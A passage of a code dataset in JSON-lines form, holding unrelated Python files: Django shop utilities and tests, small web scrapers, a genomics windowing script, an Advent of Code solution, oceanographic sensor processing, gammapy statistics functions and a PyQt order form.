SKUSpecification.objects.filter(sku=sku).order_by('spec_id')\n cur_sku_options = []\n for temp in cur_sku_spec_options:\n cur_sku_options.append(temp.option_id)\n\n goods = sku.goods\n # 罗列出和当前sku同类的所有商品的选项和商品id的映射关系\n sku_options_mapping = {}\n skus = SKU.objects.filter(goods=goods)\n for temp_sku in skus:\n sku_spec_options = SKUSpecification.objects.filter(sku=temp_sku).order_by('spec_id')\n sku_options = []\n for temp in sku_spec_options:\n sku_options.append(temp.option_id)\n sku_options_mapping[tuple(sku_options)] = temp_sku.id\n\n sku.images = SKUImage.objects.filter(sku=sku)\n\n\n specs = GoodsSpecification.objects.filter(goods=goods).order_by('id')\n\n\n\n for index,spec in enumerate(specs):\n options = SpecificationOption.objects.filter(spec=spec)\n\n temp_list = deepcopy(cur_sku_options)\n\n for option in options:\n temp_list[index] = option.id\n\n\n option.sku_id = sku_options_mapping.get(tuple(temp_list))\n\n specs.spec_options = options\n\n return goods,sku,specs\n\n\ndef generate_static_sku_detail_html(sku_id):\n\n # =================categories参数的获取,即频道信息的获取,同generate_index内的\n\n categories = get_categories()\n\n goods,sku,specs = get_goods_and_spec(sku_id)\n\n # ====================构建模板参数=========================\n context = {\n 'categories':categories,\n 'goods':goods,\n 'specs':specs,\n 'sku':sku\n }\n # 获取模板\n template = loader.get_template('detail.html')\n\n # 调用模板渲染函数,得出完整的html页面\n sku_html_text = template.render(context=context)\n\n\n # 写入静态文件\n file_path = os.path.join(\n settings.GENERATED_STATIC_HTML_FILES_DIR,\n 'goods/' + str(sku_id) + '.html'\n )\n with open(file_path,'w',encoding='utf-8') as f:\n f.write(sku_html_text)\n\n\n# if __name__ == '__main__':\n# skus = SKU.objects.all()\n# for sku in skus:\n# print(sku.id)\n# generate_static_sku_detail_html(sku.id)\n\n","sub_path":"meiduo_mall/apps/goods/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384940139","text":"import webbrowser\nfrom tkinter import *\n\nform = {\n 'dictionary': \"https://www.dictionary.com/browse/\",\n 'thesaurus': \"https://www.thesaurus.com/browse/\"\n}\n\n\ndef choose_source():\n question = \"Would like you to visit the dictionary or the thesaurus?\"\n print(question)\n while True:\n source = input('> ').lower()\n # if the search engine is a valid entry\n if source in form:\n engine_name = source.capitalize()\n # gets the base url of the entered channel\n base_url = form[source]\n else:\n print('Wrong answer! Try again.\\n')\n print(question)\n # continues the operation\n continue\n # returns the news channel and the news channel's search link\n return engine_name, base_url\n\ns, base_url = choose_source()\n\n\n#creates the gui\nroot = Tk()\nroot.title('Fast Forward')\n\n#creates a text-field for the user to enter a sarch\nString_Entry = Entry(root)\nString_Entry.grid(row=0, column=2)\n\ndef search():\n #gets the value from the text-field and saves it to url\n url = base_url + str(String_Entry.get())\n #forces the web browser to open the url\n webbrowser.open(url)\n\n text_file = open(\"Out.txt\", \"w\")\n\n\n#creates a button to search the value\nSearch_Button = Button(root, text='Search', command=search)\nSearch_Button.grid(row=0, column=0)\n#creates a button to quit out of the program\nQuit_Button = Button(root, text='Exit', command=quit)\nQuit_Button.grid(row=0, column=1)\n\n\n\n\n#ends the tkinter()\nmainloop()\n","sub_path":"Words/DictionaryThesaurus.py","file_name":"DictionaryThesaurus.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"411967920","text":"\t#!/usr/bin/env python\n\nimport re, os, shutil, time, sys\nfrom string import *\nfrom math import *\nfrom optparse import OptionParser\nimport operator\n\n\"\"\"\nThree sets of intervals of length opt.window:\n opt.flank times upstream and downstream\n gene body divided into opt.number equally spaced windows of length opt.window\n \n \n\"\"\"\n\ndef main(argv):\n\n\tparser = OptionParser()\n\n\tparser.add_option(\"-i\", \"--input\", action=\"store\", type=\"string\", dest=\"input\", metavar=\"\")\n\tparser.add_option(\"-o\", \"--ouput\", action=\"store\", type=\"string\", dest=\"output\", metavar=\"\")\n\tparser.add_option(\"-w\", action=\"store\", type=\"int\", dest=\"window\", metavar=\"\")\n\tparser.add_option(\"-n\", action=\"store\", type=\"int\", dest=\"number\", metavar=\"\")\n\tparser.add_option(\"-d\", action=\"store\", type=\"string\", dest=\"direction\", metavar=\"\")\n\n\t(opt, args) = parser.parse_args(argv)\n\t\n\tinfile = open(opt.input, 'r');\n\toutfile = open(opt.output, 'w');\n\twindow = opt.window\n\tround_factor = int(-log10(window))\n\tnumber = opt.number\n\tdirection = opt.direction\n\tflank_range = xrange(number*2)\n\tgenome_sizes = open('/home/user/packages/bedtools/genomes/mouse.mm9.genome','r');\n\n\td = {}\n\tfor line in genome_sizes:\n\t\tline = line.strip();\n\t\tsline = line.split();\n\t\tif len(sline) > 0:\n\t\t\td[sline[0]]=sline[1];\n\t\n\tfor line in infile:\n\t\tline = line.strip();\n\t\tsline = line.split();\n\t\tstrand = sline[5];\n\t\tinitial_start = 0;\n\t\tinitial_end = 0;\n\t\t\n\t\tif direction == \"start\":\n\t\t\tinitial_start = int(round(atoi(sline[1]),round_factor)) + 1\n\t\t\tinitial_end = int(round(atoi(sline[2]),round_factor))\n\t\t\t#initial_start = atoi(sline[1]) + 1\n\t\t\t#initial_end = atoi(sline[2])\n\t\telif direction == \"end\":\n\t\t\tinitial_end = int(round(atoi(sline[1]),round_factor)) \n\t\t\tinitial_start = int(round(atoi(sline[2]),round_factor)) + 1\n\t\t\t#initial_end = atoi(sline[1])\n\t\t\t#intial_start = atoi(sline[2]) + 1\n\t\tif strand == \"+\":\n\t\t\tstart = initial_start - number * window\n\t\t\tfor index in flank_range:\n\t\t\t\tend = start + window - 1\n\t\t\t\tout = sline[0] + \"\\t\" + str(start) + \"\\t\" + str(end) + \"\\t\" + sline[3] + \"\\t\" + str(index+1) + \"\\t\" + sline[5] + \"\\n\"\n\t\t\t\tif (start >= 0) and (end <= atoi(d[sline[0]])): \n outfile.write(out)\n\t\t\t\tstart = end + 1\n\t\t\t\t\n\t\telse:\n\t\t\tend = initial_end + number * window\n\t\t\tfor index in flank_range:\n\t\t\t\tstart = end - window + 1\n\t\t\t\tout = sline[0] + \"\\t\" + str(start) + \"\\t\" + str(end) + \"\\t\" + sline[3] + \"\\t\" + str(index+1) + \"\\t\" + sline[5] + \"\\n\"\n\t\t\t\tif (start >= 0) and (end <= atoi(d[sline[0]])): \n outfile.write(out)\n\t\t\t\tend = start - 1\n\t\t\t\t\n\n\toutfile.close();\n\t\t\nif __name__ == \"__main__\":\n\tmain(sys.argv) \t\n","sub_path":"python/bed/windowflanksRound.py","file_name":"windowflanksRound.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"126662404","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n# Created on 2018-07-28 08:49:54\r\n# Project: gpfh4\r\n\r\n# sys\r\nimport json\r\nimport time\r\n# thirdpart\r\nimport pandas as pd\r\nfrom requests.models import RequestEncodingMixin\r\n\r\n# encode_params = RequestEncodingMixin._encode_params\r\n\r\nfrom pymongo import MongoClient\r\nfrom pymongo import errors\r\n\r\n# this project\r\nif __name__ == '__main__':\r\n import sys\r\n sys.path.append(r'C:\\workspace\\code\\self\\github\\py-code\\new_stock')\r\n##########################\r\nimport util\r\nimport const\r\nimport query\r\nfrom fake_spider import spider2\r\n\r\n\r\n#####################################################\r\nclass MyNumbers:\r\n def __init__(self, **kwargs):\r\n print(dir(query))\r\n self.codes = query.query_stock_list.queryAllCode()\r\n self.kwargs = kwargs\r\n self.counter = 0\r\n \r\n def __iter__(self):\r\n return self\r\n \r\n def __next__(self):\r\n if self.counter < len(self.codes):\r\n code = self.codes[self.counter]\r\n head = \"sh\"\r\n if code[0] == '0' or code[0] == '3':\r\n head = 'sz'\r\n url = \"https://eniu.com/chart/roea/{0}{1}\".format(\r\n head, code)\r\n \r\n if self.counter % 50 == 0:\r\n print(\"now code............................................................... {0}\".format(code))\r\n self.counter += 1\r\n return (url, self.kwargs)\r\n else:\r\n raise StopIteration\r\n\r\n\r\nclass Handler(spider2.FakeSpider):\r\n crawl_config = {\r\n }\r\n \r\n def __init__(self):\r\n spider2.FakeSpider.__init__(self)\r\n self.notOK = 0\r\n \r\n def on_start(self):\r\n myclass = MyNumbers(headers=self.header(), callback=self.processFirstPage)\r\n myiter = iter(myclass)\r\n self.crawl(myiter)\r\n #self.crawl(self.url(), headers=self.header(), callback=self.processFirstPage)\r\n \r\n def url(self):\r\n url = \"https://eniu.com/chart/roea/sh{0}\".format(\"601398\")\r\n out = []\r\n out.append(url)\r\n return out\r\n # begin = 500\r\n # begin2 = 400\r\n # for one in range(1, 100):\r\n # code = begin + one\r\n # code2 = begin2 + one\r\n # url = \"https://xueqiu.com/cubes/data/rank_percent.json?cube_symbol=ZH000{{0:06d}}&cube_id={1}&market=cn&dimension=annual&_=1574180296578\".format(\r\n # code, code2)\r\n # print(url)\r\n # out.append(url)\r\n # return out\r\n \r\n def header(self):\r\n headers = {\r\n \"Accept\": \"application/json, text/plain, */*\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7\",\r\n \"Connection\": \"keep-alive\",\r\n \"Cookie\": \"PHPSESSID=0v43ul88556id679l4b9rojp00; Hm_lvt_45d0f23af3186fc1292d2629c2cbacb6=1574876344; __gads=Test; Hm_lpvt_45d0f23af3186fc1292d2629c2cbacb6=1574908733\",\r\n \"Host\": \"eniu.com\",\r\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',\r\n \"Referer\": \"ttps://eniu.com/gu/sh601398/roe\",\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n }\r\n return headers\r\n \r\n def processFirstPage(self, response):\r\n if response.ok == False:\r\n self.notOK += 1\r\n if self.notOK > 20:\r\n print(response.url)\r\n return\r\n \r\n try:\r\n data1 = response.content[1:-1]\r\n data2 = data1.decode(\"ascii\")\r\n data3 = data2.replace(\"\\\\\", \"\")\r\n jsonData = json.loads(data3) # , encoding='GB2312')\r\n urls = response.url.split('/')\r\n jsonData[\"_id\"] = urls[-1]\r\n util.saveMongoDB2(jsonData, \"stock2\", \"roe\")\r\n #util.saveMongoDB2(jsonData, \"stock2\", \"roe\")\r\n except UnicodeDecodeError as e:\r\n print(e)\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\ndef ProcessRank():\r\n # 每10万一个分组,计算这个分组里面每个百分段的数量,并存储90%+分段的id\r\n client = MongoClient()\r\n db = client['snowball']\r\n collection = db['zh_one']\r\n out = {}\r\n index = 0\r\n cursor = collection.find()\r\n for one in cursor:\r\n try:\r\n barrel = int(one[\"_id\"][2:3])\r\n rank = one[\"rank\"]\r\n barrel2 = int(rank / 10)\r\n if not barrel in out:\r\n out[barrel] = {}\r\n if not barrel2 in out[barrel]:\r\n out[barrel][barrel2] = {}\r\n out[barrel][barrel2][\"counter\"] = 0\r\n out[barrel][barrel2][\"list\"] = []\r\n \r\n out[barrel][barrel2][\"counter\"] += 1\r\n if barrel2 >= 9 or barrel2 == 0:\r\n out[barrel][barrel2][\"list\"].append(one[\"_id\"][2:])\r\n \r\n index += 1\r\n if index % 1000 == 0:\r\n print(\"the id processing is \" + one[\"_id\"])\r\n except Exception as e:\r\n print(e)\r\n \r\n Save(out)\r\n\r\n\r\ndef Save(out):\r\n for k, one in out.items():\r\n for k2, two in one.items():\r\n data = {}\r\n data[\"_id\"] = str(k) + \":\" + str(k2)\r\n data[\"counter\"] = two[\"counter\"]\r\n data[\"list\"] = two[\"list\"]\r\n util.saveMongoDB2(data, \"snowball\", \"zh_digest\")\r\n\r\n\r\ndef ProcessRank2():\r\n # 找到大于98分为的组合\r\n client = MongoClient()\r\n db = client['snowball']\r\n collection = db['zh_one']\r\n out = {}\r\n index = 0\r\n cursor = collection.find()\r\n for one in cursor:\r\n try:\r\n barrel = int(one[\"_id\"][2:3])\r\n rank = one[\"rank\"]\r\n if rank >= 98:\r\n out[\"_id\"] = one[\"_id\"][2:]\r\n out[\"rank\"] = rank\r\n util.saveMongoDB2(out, \"snowball\", \"zh_digest98\")\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\ndef run():\r\n gpfh = Handler()\r\n gpfh.on_start()\r\n gpfh.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n # ProcessRank2()\r\n run()\r\n","sub_path":"new_stock/fake_spider/roe.py","file_name":"roe.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"507164710","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 1 10:48:14 2018\n\n@author: Thomas\n\"\"\"\n\nimport time\nfrom collections import Counter\nfrom itertools import combinations\n\nt = time.process_time()\n\nwith open('in') as f:\n #box_ids = f.readlines()\n box_ids = f.read().split('\\n')\n\ntwos = 0 \nthrees = 0\np1 = 0\np2 = 0\n\nfor ID in box_ids:\n counter = Counter(ID)\n twos += int(2 in counter.values())\n threes += int(3 in counter.values())\n \np1 = twos * threes\n\nprint(\"Problem 1: {}\".format(p1))\nt = time.process_time() - t\nprint(\"Time elapsed: {0:.2f} s\".format(t))\n\nt = time.process_time()\n \nfor s1, s2 in combinations(box_ids, 2):\n count = 0\n p2 = ''\n for x in range(len(s1)):\n if s1[x] != s2[x]:\n count += 1\n else:\n p2 += s1[x]\n if count == 1:\n break\n \nprint(\"Problem 2: {}\".format(p2))\nt = time.process_time() - t\nprint(\"Time elapsed: {0:.2f} s\".format(t))","sub_path":"2018/aoc02/aoc02.py","file_name":"aoc02.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225101688","text":"from __future__ import division, print_function\n\nimport numpy as np\nimport matplotlib.pyplot as ppl\n\nfrom NIOZhst.Chain import Chain\nfrom NIOZhst import reindex\n\nppl.close('all')\n\n#\n# Configuration\n#\n\n# Base path of the cruise data (with final /)\ndata_path = '../data/'\n# path to the calibration data\ncalib_path = '../results/'\n# Name of the calibration file\ncalib_file1 = calib_path+'Calibration1.hdf'\ncalib_file2 = calib_path+'Calibration2.hdf'\n\n# Wrong thermistor numbers\nwrong = [8, 9,17,30,63,64,65,72,73,74,90]\n# Right thermistor numbers\ntrue = [110,109,108,107,106,105,72,111,104,103,102]\n# A dictionary of corrections, it can be entered as {a:b, c:d,...} where a,b,c,d are the file numbers\nth_corr = dict(zip(wrong,true))\n\n# dictionary with wrong ids\nwr_ids = {72:222}\n\n# List of thermistor files\nth_files = ['{:04d}'.format(reindex(t,th_corr))+'_000.SEN' \\\n for t in range(1,102)]\n\n# Depth axis\nZ = -549+np.arange(len(th_files))*0.5\n\n# First autoscale: get data from these dates\nStart = 143.\nEnd = 158.5\n\n# Second autoscale: get data from these dates\nStart2 = 143.\nEnd2 = 158.5\n\n# Sync dates\nsync_start = 150\nsync_end = 151\n\n# Number of subsets used for time dependent autoscaling\nchunks = 40\n\n#Output directory\nout_dir = '../results/'\nfig_dir = '../figures/'\n\n# File Name for final output\nout_file = out_dir+'output_detail_65c.chn'\n# Intermediate outputs\nout_file_t1 = out_dir+'output_detail_1as_65.chn'\n\n# Time step for plotting (negative to average)\nndt = -600\n\n#\n# Processing\n#\n\nC = Chain()\nC.append_therms(data_path, th_files, Z, wr_ids)\n\nC.import_calib(CalibChains=[calib_file1], CalEx=[\"zero\"])\nC.import_calib(CalibChains=[calib_file2], CalEx=[\"zero\"])\n\n#C.diagnostic(\"zero\", IdInc=(59,76,98))\n#C.diagnostic(\"weak\", IdInc=(5,))\n\n# Perform synchronization of the string\nC.check_missing_points(0)\nC.synchronize(Ex=\"zero\", Range=(sync_start,sync_end), Convention=\"yearday\")\n\n# Do autoscaling\nC.autoscale(Method='spline', pw=0.7, Smooth=0.2, Threshold=15, \\\n Range=(Start,End), Convention='yearday', Subsets=chunks)\n\n#C.time_ascale(stex=True, aveRange=1.0)\nC.time_ascale(Plot=fig_dir+'time_ascale_gamma', stex=True, aveRange=1.0)\n\nC.quick_save(out_file_t1)\n\n# # Do second autoscaling autoscaling\nC.autoscale(Method='spline', pw=0.7, Smooth=0.1, Threshold=0.5, \\\n Range=(Start2,End2), Convention='yearday', Subsets=chunks)\n\n# #C.time_ascale(stex=True, aveRange=1.0)\nC.time_ascale(Plot=fig_dir+'time_ascale_gamma2', stex=True, aveRange=1.0)\n \nC.quick_save(out_file)\n\n#Plot data\nif 0:\n print ('Plot data')\n time, Temper = C.to_array(Range=(Start,End), Convention='yearday', \\\n Fill='missing', Skip=ndt, Ex=[\"zero\"])\n\n F = ppl.figure()\n F.subplots_adjust(right=0.99, top=0.99)\n AX = F.add_subplot(111)\n #Tmin = Temper.min(); Tmax=Temper.max()\n Tmin = 11; Tmax = 15\n levs = Tmin + (Tmax-Tmin)*np.linspace(0, 1, 80)\n dt = np.mean(np.diff(time)); dz = np.mean(np.diff(Z))\n lims = (time[0]-0.5*dt,time[-1]+0.5*dt,Z[0]-0.5*dz,Z[-1]+0.5*dz)\n c = AX.imshow(Temper, aspect='auto', vmin=Tmin, vmax=Tmax,\\\n extent=lims)\n AX.set_xlabel('Time $\\\\mathrm{[yearday]}$')\n AX.set_ylabel('Depth $\\\\mathrm{[m]}$')\n #AX.invert_yaxis()\n clb = F.colorbar(c, format='%.2f')\n clb.set_label('Temp. ($^\\circ C$)')\n F.show()\n F.savefig(fig_dir+'temperature_day_{}_{}.png'.format(Start,End))\n","sub_path":"Meteor18days/ProcessData/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"136543990","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Conversion functions for test statistic <-> significance <-> probability.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport numpy as np\n\n# TODO: make all the other methods private?\n# need to transfer the info from their docstrings to `convert_likelihood` first!\n# TODO: check with MC study if there's a factor 2 error in the p-values\n# because half of the TS values are exactly zero when fitting e.g. source extension.\n# Do we need to introduce a bool \"one_sided\" or \"hard_limit\"?\n\n\n__all__ = ['convert_likelihood',\n 'significance_to_probability_normal',\n 'probability_to_significance_normal',\n 'probability_to_significance_normal_limit',\n 'significance_to_probability_normal_limit',\n ]\n\n\ndef convert_likelihood(to, probability=None, significance=None,\n ts=None, chi2=None, df=None):\n \"\"\"Convert between various equivalent likelihood measures.\n\n TODO: don't use ``chi2`` with this function at the moment ...\n I forgot that one also needs the number of data points to\n compute ``ts``:\n http://en.wikipedia.org/wiki/Pearson%27s_chi-squared_test#Calculating_the_test-statistic\n Probably it's best to split this out into a separate function\n or just document how users should compute ``ts`` before calling this\n function if they have ``chi2``.\n\n\n This function uses the ``sf`` and ``isf`` methods of the\n `~scipy.stats.norm` and `~scipy.stats.chi2` distributions\n to convert between various equivalent ways to quote a likelihood.\n\n - ``sf`` means \"survival function\", which is the \"tail probability\"\n of the distribution and is defined as ``1 - cdf``, where ``cdf``\n is the \"cumulative distribution function\".\n - ``isf`` is the inverse survival function.\n\n The relation between the quantities can be summarised as:\n\n - significance <-- normal distribution ---> probability\n - probability <--- chi2 distribution with df ---> ts\n - ts = chi2 / df\n\n So supporting both ``ts`` and ``chi2`` in this function is redundant,\n it's kept as a convenience for users that have a ``ts`` value from\n a Poisson likelihood fit and users that have a ``chi2`` value from\n a chi-square fit.\n\n Parameters\n ----------\n to : {'probability', 'ts', 'significance', 'chi2'}\n Which quantity you want to compute.\n probability, significance, ts, chi2 : array_like\n Input quantity value ... mutually exclusive, pass exactly one!\n df : array_like\n Difference in number of degrees of freedom between\n the alternative and the null hypothesis model.\n\n Returns\n -------\n value : `numpy.ndarray`\n Output value as requested by the input ``to`` parameter.\n\n Notes\n -----\n\n **TS computation**\n\n Under certain assumptions Wilk's theorem say that the likelihood ratio\n ``TS = 2 (L_alt - L_null)`` has a chi-square distribution with ``ndf``\n degrees of freedom in the null hypothesis case, where\n ``L_alt`` and ``L_null`` are the log-likelihoods in the null and alternative\n hypothesis and ``ndf`` is the difference in the number of freedom in those models.\n\n Note that the `~gammapy.stats.cash` statistic already contains the factor 2,\n i.e. you should compute ``TS`` as ``TS = cash_alt - cash_null``.\n\n - http://en.wikipedia.org/wiki/Chi-squared_distribution\n - http://docs.scipy.org/doc/scipy-dev/reference/generated/scipy.stats.chi2.html\n - http://en.wikipedia.org/wiki/Likelihood-ratio_test#Wilks.27s_theorem\n - http://adsabs.harvard.edu/abs/1979ApJ...228..939C\n - http://adsabs.harvard.edu/abs/2009A%26A...495..989S\n\n **Physical limits**\n\n ``probability`` is the one-sided `p-value`, e.g. `significance=3`\n corresponds to `probability=0.00135`.\n\n TODO: check if this gives correct coverage for cases with hard physical limits,\n e.g. when fitting TS of extended sources vs. point source and in half of the\n cases ``TS=0`` ... I suspect coverage might not be OK and we need to add an\n option to this function to handle those cases!\n\n Examples\n --------\n Here's some examples how to compute the ``probability`` or ``significance``\n for a given observed ``ts`` or ``chi2``:\n\n >>> from gammapy.stats import convert_likelihood\n >>> convert_likelihood(to='probability', ts=10, df=2)\n 0.0067379469990854679\n >>> convert_likelihood(to='significance', chi2=19, df=7)\n 2.4004554920435521\n\n Here's how to do the reverse, compute the ``ts`` or ``chi2`` that would\n result in a given ``probability`` or ``significance``.\n\n >>> convert_likelihood(to='ts', probability=0.01, df=1)\n 6.6348966010212171\n >>> convert_likelihood(to='chi2', significance=3, df=10)\n 28.78498865156606\n \"\"\"\n from scipy.stats import norm as norm_distribution\n from scipy.stats import chi2 as chi2_distribution\n\n # ---> Check inputs are OK!\n # ---> This is a function that will be used interactively by end-users,\n # ---> so we want good error messages if they use it correctly.\n\n # Check that the output `to` parameter is valid\n valid_quantities = ['probability', 'ts', 'significance', 'chi2']\n if to not in valid_quantities:\n msg = 'Invalid parameter `to`: {}\\n'.format(to)\n msg += 'Valid options are: {}'.format(valid_quantities)\n raise ValueError(msg)\n\n # Check that the input is valid\n _locals = locals().copy()\n input_values = [_ for _ in valid_quantities\n if _locals[_] is not None]\n if len(input_values) != 1:\n msg = 'You have to pass exactly one of the valid input quantities: '\n msg += ', '.join(valid_quantities)\n msg += '\\nYou passed: '\n if len(input_values) == 0:\n msg += 'none'\n else:\n msg += ', '.join(input_values)\n raise ValueError(msg)\n\n input_type = input_values[0]\n input_value = locals()[input_type]\n\n # Check that `df` is given if it's required for the computation\n if any(_ in ['ts', 'chi2'] for _ in [input_type, to]) and df is None:\n msg = 'You have to specify the number of degrees of freedom '\n msg += 'via the `df` parameter.'\n raise ValueError(msg)\n\n\n # ---> Compute the requested quantity\n # ---> By now we know the inputs are OK.\n\n # Compute equivalent `ts` for `chi2` ... after this\n # the code will only handle the `ts` input case,\n # i.e. conversions: significance <-> probability <-> ts\n if chi2 is not None:\n ts = chi2 / df\n\n # A note that might help you understand the nested if-else-statement:\n # The quantities `probability`, `significance`, `ts` and `chi2`\n # form a graph with `probability` at the center.\n # There might be functions directly relating the other quantities\n # in general or in certain limits, but the computation here\n # always proceeds via `probability` as a one- or two-step process.\n\n if to == 'significance':\n if ts is not None:\n probability = chi2_distribution.sf(ts, df)\n return norm_distribution.isf(probability)\n\n elif to == 'probability':\n if significance is not None:\n return norm_distribution.sf(significance)\n else:\n return chi2_distribution.sf(ts, df)\n\n elif to == 'ts':\n # Compute a probability if needed\n if significance is not None:\n probability = norm_distribution.sf(significance)\n\n return chi2_distribution.isf(probability, df)\n\n elif to == 'chi2':\n if ts is not None:\n return df * ts\n # Compute a probability if needed\n if significance is not None:\n probability = norm_distribution.sf(significance)\n\n return chi2_distribution.isf(probability, df)\n\n\ndef significance_to_probability_normal(significance):\n \"\"\"Convert significance to one-sided tail probability.\n\n Parameters\n ----------\n significance : array_like\n Significance\n\n Returns\n -------\n probability : ndarray\n One-sided tail probability\n\n See Also\n --------\n probability_to_significance_normal,\n significance_to_probability_normal_limit\n\n Examples\n --------\n >>> significance_to_probability_normal(0)\n 0.5\n >>> significance_to_probability_normal(1)\n 0.15865525393145707\n >>> significance_to_probability_normal(3)\n 0.0013498980316300933\n >>> significance_to_probability_normal(5)\n 2.8665157187919328e-07\n >>> significance_to_probability_normal(10)\n 7.6198530241604696e-24\n \"\"\"\n from scipy.stats import norm\n return norm.sf(significance)\n\n\ndef probability_to_significance_normal(probability):\n \"\"\"Convert one-sided tail probability to significance.\n\n Parameters\n ----------\n probability : array_like\n One-sided tail probability\n\n Returns\n -------\n significance : ndarray\n Significance\n\n See Also\n --------\n significance_to_probability_normal,\n probability_to_significance_normal_limit\n\n Examples\n --------\n >>> probability_to_significance_normal(1e-10)\n 6.3613409024040557\n \"\"\"\n from scipy.stats import norm\n return norm.isf(probability)\n\n\ndef _p_to_s_direct(probability, one_sided=True):\n \"\"\"Direct implementation of p_to_s for checking.\n\n Reference: RooStats User Guide Equations (6,7).\n \"\"\"\n from scipy.special import erfinv\n probability = 1 - probability # We want p to be the tail probability\n temp = np.where(one_sided, 2 * probability - 1, probability)\n return np.sqrt(2) * erfinv(temp)\n\n\ndef _s_to_p_direct(significance, one_sided=True):\n \"\"\"Direct implementation of s_to_p for checking.\n\n Note: _p_to_s_direct was solved for p.\n \"\"\"\n from scipy.special import erf\n temp = erf(significance / np.sqrt(2))\n probability = np.where(one_sided, (temp + 1) / 2., temp)\n return 1 - probability # We want p to be the tail probability\n\n\ndef probability_to_significance_normal_limit(probability):\n \"\"\"Convert tail probability to significance\n in the limit of small p and large s.\n\n Reference: Equation (4) of\n http://adsabs.harvard.edu/abs/2007physics...2156C\n They say it is better than 1% for s > 1.6.\n\n Asymptotically: s ~ sqrt(-log(p))\n \"\"\"\n u = -2 * np.log(probability * np.sqrt(2 * np.pi))\n return np.sqrt(u - np.log(u))\n\n\ndef significance_to_probability_normal_limit(significance, guess=1e-100):\n \"\"\"Convert significance to tail probability\n in the limit of small p and large s.\n\n See p_to_s_limit docstring\n Note: s^2 = u - log(u) can't be solved analytically.\n \"\"\"\n from scipy.optimize import fsolve\n\n def f(probability):\n if probability > 0:\n return probability_to_significance_normal_limit(probability) - significance\n else:\n return 1e100\n\n return fsolve(f, guess)\n","sub_path":"gammapy/stats/significance.py","file_name":"significance.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1141367","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl='https://www.programcreek.com/python/index/221/requests'\nres=requests.get(url).text\nsoup=BeautifulSoup(res,'lxml')\nlist=[]\nfor aa in soup.find_all(attrs={'id':'api-list-apiname'}):\n list.append(aa.a['href'])\n\n\ndef one(url):\n res=requests.get(url).text\n soup=BeautifulSoup(res,'lxml')\n for a2 in soup.find_all(attrs={'class':'examplebox'}):\n print(a2.find(attrs={'class':'exampleboxbody'}).pre.text)\n with open('r04de.txt','a',encoding='utf-8') as f:\n f.write('\\n'+a2.find(attrs={'class':'exampleboxbody'}).pre.text+'\\n')\n\n\nfor k in list:\n one(k)\n\n","sub_path":"homework7/r04.py","file_name":"r04.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"630270727","text":"from django.test import TestCase\nfrom django.urls import resolve\nfrom django.http import HttpRequest\nfrom django.contrib.staticfiles import finders\n\nfrom webpage.views import home_page, gallery_page\n\n\nclass HomePageTest(TestCase):\n\n def test_root_url_resolves_to_home_page_view(self):\n found = resolve('/')\n self.assertEqual(found.func, home_page)\n\n def test_home_page_returns_correct_html(self):\n response = self.client.get('/')\n self.assertTemplateUsed(response, 'home.html')\n\n def test_image_uploaded(self):\n request = HttpRequest()\n response = home_page(request)\n html = response.content.decode('utf8')\n\n self.assertIn(' 0 and c <= 9 and (\n curid == tab.getOnlyData((r - 1, 0))):\n return ''\n elif c == 2 and role == Qt.DecorationRole and submited and curid != tab.getOnlyData((r - 1, 0)):\n return self.ok_icon\n elif c == 2 and role == Qt.DisplayRole and submited:\n return \"Submited\"\n else:\n return super().data(index, role=role)\n\n\nclass JPFuncForm_OutboundOrder(JPFunctionForm):\n def __init__(self, MainForm):\n super().__init__(MainForm)\n self.MainForm = MainForm\n sql_0 = \"\"\"\n SELECT o.fOrderID as 出库单号OrderID,\n fOrderDate as 日期OrderDate,\n fSubmited as 提交,\n fCustomerName as 客户名Cliente,\n fRequiredDeliveryDate as 交货日期RequiredDeliveryDate,\n o.fAmount as 总金额SubTotal,\n fDesconto as 折扣Desconto,\n fTax as 税金IVA,\n fPayable as `应付金额Valor a Pagar`,\n o.fContato as 联系人Contato,\n Null as ``,\n p.fProductName AS '名称Descrição',\n t.fQuant AS '数量Qtd',\n t.fPrice AS '单价P. Unitario', \n t.fAmount AS '金额Total'\n from v_product_outbound_order as o \n right join t_product_outbound_order_detail as t on o.fOrderID=t.fOrderID \n\t\t\t\t\tleft Join t_product_information as p on t.fProductID=p.fID\n \"\"\"\n sql_1 = sql_0 + \"\"\"\n WHERE fOrderDate{date}\n AND (fSubmited={ch1} OR fSubmited={ch2})\n AND fOrderDate{date}\n ORDER BY o.fOrderID DESC\"\"\"\n sql_2 = sql_0 + \"\"\" ORDER BY o.fOrderID DESC\"\"\"\n self.backgroundWhenValueIsTrueFieldName = ['fSubmited']\n self.checkBox_1.setText('Submited')\n 